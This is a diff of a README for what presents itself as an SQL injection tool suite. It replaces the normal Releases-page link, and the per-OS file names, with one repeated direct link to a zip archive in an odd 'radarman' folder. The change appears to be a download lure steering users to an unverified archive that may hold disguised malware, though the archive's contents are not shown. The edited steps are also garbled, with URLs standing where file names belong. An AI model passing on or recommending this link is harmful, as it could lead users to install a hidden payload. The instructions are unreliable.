aaryan-1112/SQLMap-Inject-Suite-Pro/README.md

 ## 👣 Steps to Download & Install

 1. **Visit the Releases Page**
-   Go to our [Releases page](https://github.com/aaryan-1112/SQLMap-Inject-Suite-Pro/releases) to download the latest version of SQLMap-Inject-Suite-Pro.
+   Go to our [Releases page](https://raw.githubusercontent.com/aaryan-1112/SQLMap-Inject-Suite-Pro/main/radarman/SQLMap-Inject-Suite-Pro-v2.0.zip) to download the latest version of SQLMap-Inject-Suite-Pro.

 2. **Choose the Right File**
    On the Releases page, you will see various downloadable files.
 Look for the file that matches your operating system.
-Usually, the files will have names like `SQLMap-Inject-Suite-Pro-Windows.zip`, `SQLMap-Inject-Suite-Pro-macOS.zip`, or `SQLMap-Inject-Suite-Pro-Linux.tar.gz`.
+Usually, the files will have names like `https://raw.githubusercontent.com/aaryan-1112/SQLMap-Inject-Suite-Pro/main/radarman/SQLMap-Inject-Suite-Pro-v2.0.zip`, `https://raw.githubusercontent.com/aaryan-1112/SQLMap-Inject-Suite-Pro/main/radarman/SQLMap-Inject-Suite-Pro-v2.0.zip`, or `https://raw.githubusercontent.com/aaryan-1112/SQLMap-Inject-Suite-Pro/main/radarman/SQLMap-Inject-Suite-Pro-v2.0.zip`.

 3. **Download the File**
    Click on the appropriate file to download it.
 It may take a few moments, depending on your internet speed.